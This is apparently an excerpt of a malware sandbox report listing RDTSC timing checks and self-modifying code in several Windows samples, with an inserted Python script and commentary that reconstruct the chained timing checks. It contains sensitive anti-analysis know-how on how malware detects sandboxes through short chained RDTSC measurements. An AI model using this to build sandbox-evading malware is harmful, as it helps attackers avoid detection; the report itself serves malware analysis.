Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D5D second address: 4E40D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D61 second address: 4E40DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A58h 0x00000013 xor si, 3548h 0x00000018 jmp 00007F0E94F51A4Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0E94F51A58h 0x00000024 sbb esi, 649DF7A8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40DC4 second address: 4E40DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40DCA second address: 4E40DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40DCE second address: 4E40DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx edi, cx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50DD1 second address: 4E50DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50DD7 second address: 4E50DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50DF7 second address: 4E50DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50DFB second address: 4E50E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50E01 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E94F51A58h 0x00000008 pop ecx 0x00000009 jmp 00007F0E94F51A4Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F0E94F51A59h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0E94F51A4Eh 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 mov bl, D6h 0x00000023 pop ecx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50E5E second address: 4E50E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50E6C second address: 4E50E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 44D57068h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50E76 second address: 4E50E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50B4E second address: 4E50B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50B60 second address: 4E50B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50B64 second address: 4E50B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push esi 0x00000013 push edi 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 mov al, D3h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0E94F51A53h 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50B9D second address: 4E50BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC0289 second address: 4EC02A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02A2 second address: 4EC02A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02A8 second address: 4EC02AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02AC second address: 4EC02B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02B0 second address: 4EC02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02BF second address: 4EC02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02C3 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC02D9 second address: 4EC030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, C6h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A51h 0x00000015 jmp 00007F0E94F51A4Bh 0x0000001a popfd 0x0000001b movzx esi, bx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC030A second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E601E0 second address: 4E601E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E601E8 second address: 4E60219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a movsx edx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC06F8 second address: 4EC06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC06FE second address: 4EC074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F0E948C9FBDh 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov si, C06Dh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d call 00007F0E948C9FC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC074A second address: 4EC07BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edx, 78C2B0E4h 0x0000000a popad 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A59h 0x00000015 sub ax, 2FD6h 0x0000001a jmp 00007F0E94F51A51h 0x0000001f popfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 popad 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edi, si 0x0000002f call 00007F0E94F51A56h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC07BC second address: 4EC07D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC07D7 second address: 4EC0805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F0E94F51A49h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC0805 second address: 4EC0818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC0818 second address: 4EC085D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A4Ah 0x00000013 jmp 00007F0E94F51A55h 0x00000018 popfd 0x00000019 push esi 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC085D second address: 4EC0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC0863 second address: 4EC0867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC0867 second address: 4EC08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 call 00007F0E948C9FBFh 0x00000015 pushfd 0x00000016 jmp 00007F0E948C9FC8h 0x0000001b xor esi, 52B44698h 0x00000021 jmp 00007F0E948C9FBBh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 jmp 00007F0E948C9FC9h 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0E948C9FC3h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC08EF second address: 4EC090C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC090C second address: 4EC0933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C4D17 second address: 5C4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F30 second address: 5B8F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F39 second address: 5B8F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F43 second address: 5B8F49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F49 second address: 5B8F6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E94F51A55h 0x0000000d jne 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C3D32 second address: 5C3D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C3D36 second address: 5C3D3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C3D3F second address: 5C3D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E948C9FC0h 0x0000000c jmp 00007F0E948C9FBEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C3EB8 second address: 5C3F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A55h 0x0000000b jmp 00007F0E94F51A4Bh 0x00000010 jbe 00007F0E94F51A52h 0x00000016 popad 0x00000017 push eax 0x00000018 push ebx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F0E94F51A46h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C3F02 second address: 5C3F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C4079 second address: 5C40A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E94F51A4Fh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C40A1 second address: 5C40A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C40A5 second address: 5C40C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C40C1 second address: 5C40C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C40C7 second address: 5C40D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A4Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C40D8 second address: 5C40DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C4625 second address: 5C4639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jns 00007F0E948C9FD0h 0x00000011 push esi 0x00000012 jmp 00007F0E948C9FC8h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D18C5h], eax 0x0000001f push 00000003h 0x00000021 and ecx, dword ptr [ebp+122D2834h] 0x00000027 push 00000000h 0x00000029 mov di, si 0x0000002c push 00000003h 0x0000002e mov edi, eax 0x00000030 call 00007F0E948C9FB9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C6CEC second address: 5C6D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E94F51A57h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
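Each "RDTSC instruction interceptor" line above is one pair of RDTSC executions and the instructions the sample ran between them; where the second address of one line is the first address of the next, the protector has strung several measurements together. The Python below is an added reading aid for this report, not Joe Sandbox code and not code from the samples. It parses such lines (the embedded ones are copied from the list above), splits the gap between the two RDTSCs into filler (pushad/popad, push/pop, jmp/call) versus instructions that do work, and links consecutive pairs into chains per process. All function and variable names are this example's own.

```python
"""Reconstruct the RDTSC timing checks behind "RDTSC instruction interceptor" lines.

Added example for reading this report; not sandbox code and not the samples' code.
A gap of pure register shuffling times a handful of instructions: tiny on bare metal,
inflated under tracing or emulation.  Records whose second address is another
record's first address form one chain of back-to-back measurements.
"""
import re
from collections import defaultdict

# Copied verbatim from the report above (a subset is enough to show chaining).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5C4D17 second address: 5C4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F30 second address: 5B8F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F39 second address: 5B8F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc",
    r"Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F43 second address: 5B8F49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe RDTSC instruction interceptor: First address: 5B8F49 second address: 5B8F6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E94F51A55h 0x0000000d jne 00007F0E94F51A46h 0x00000013 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC06F8 second address: 4EC06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC085D second address: 4EC0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    r"Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EC0863 second address: 4EC0867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
]

LINE_RE = re.compile(
    r"Source: (?P<proc>\S+) RDTSC instruction interceptor: "
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<body>.+)$"
)
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")   # "0x00000002 " offset prefixes

# State save/restore and plain flow redirection: the protector's padding,
# not the measurement itself.
FILLER = {"pushad", "popad", "pushfd", "popfd", "push", "pop", "jmp", "call", "nop"}


def parse_line(line):
    """One report line -> record dict, or None if it is not an RDTSC line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    instrs = [i.strip() for i in OFFSET_RE.split(m["body"]) if i.strip()]
    return {
        "proc": m["proc"].rsplit("\\", 1)[-1],
        "first": int(m["first"], 16),
        "second": int(m["second"], 16),
        "instrs": instrs,
    }


def classify(rec):
    """(gap, work): instruction count between the two RDTSCs, and how many
    of them are not filler (moves, arithmetic, conditional jumps)."""
    instrs = rec["instrs"]
    if instrs[0] != "rdtsc" or instrs[-1] != "rdtsc":
        raise ValueError("record does not start and end with rdtsc")
    gap = instrs[1:-1]
    return len(gap), sum(1 for i in gap if i.split()[0] not in FILLER)


def build_chains(records):
    """{proc: [[addr, ...], ...]}: link records whose second address is the
    first address of another record of the same process."""
    by_proc = defaultdict(dict)
    for r in records:
        by_proc[r["proc"]][r["first"]] = r
    chains = {}
    for proc, recs in by_proc.items():
        seconds = {r["second"] for r in recs.values()}
        chains[proc] = []
        for head in sorted(a for a in recs if a not in seconds):
            chain, addr = [head], head
            while addr in recs and recs[addr]["second"] not in chain:  # cycle guard
                addr = recs[addr]["second"]
                chain.append(addr)
            chains[proc].append(chain)
    return chains


def analyze(lines):
    """Parse, chain and summarise; returns (records, chains, summary)."""
    records = [r for r in map(parse_line, lines) if r]
    chains = build_chains(records)
    summary = {}
    for proc, cl in chains.items():
        gaps = [classify(r) for r in records if r["proc"] == proc]
        summary[proc] = {
            "records": len(gaps),
            "chains": len(cl),
            "longest_chain": max((len(c) for c in cl), default=0),
            "pure_filler": sum(1 for _, work in gaps if work == 0),
        }
    return records, chains, summary


if __name__ == "__main__":
    _, chains, summary = analyze(SAMPLE_LINES)
    for proc, s in summary.items():
        print(proc, s)
        for chain in chains[proc]:
            print("   ", " -> ".join(f"{a:X}" for a in chain))
```

Run against the embedded lines, RoamingAEGIJKEHCA.exe yields a five-address chain 5B8F30 -> 5B8F39 -> 5B8F43 -> 5B8F49 -> 5B8F6C, i.e. four consecutive measurements with three to eight instructions between each RDTSC pair and almost nothing but filler in the gaps. That shape is the practical takeaway: an environment that traps or single-steps RDTSC pays its overhead on every link of the chain, so the sample does not need a single large threshold, only consistency across several short deltas.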
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Special instruction interceptor: First address: ABECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Special instruction interceptor: First address: ABEC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Special instruction interceptor: First address: C9B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Special instruction interceptor: First address: C8145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Special instruction interceptor: First address: CFE86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Special instruction interceptor: First address: 5F0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Special instruction interceptor: First address: 5F0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: F2ECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: F2EC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 110B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 10F145C instructions caused by: Self-modifying code
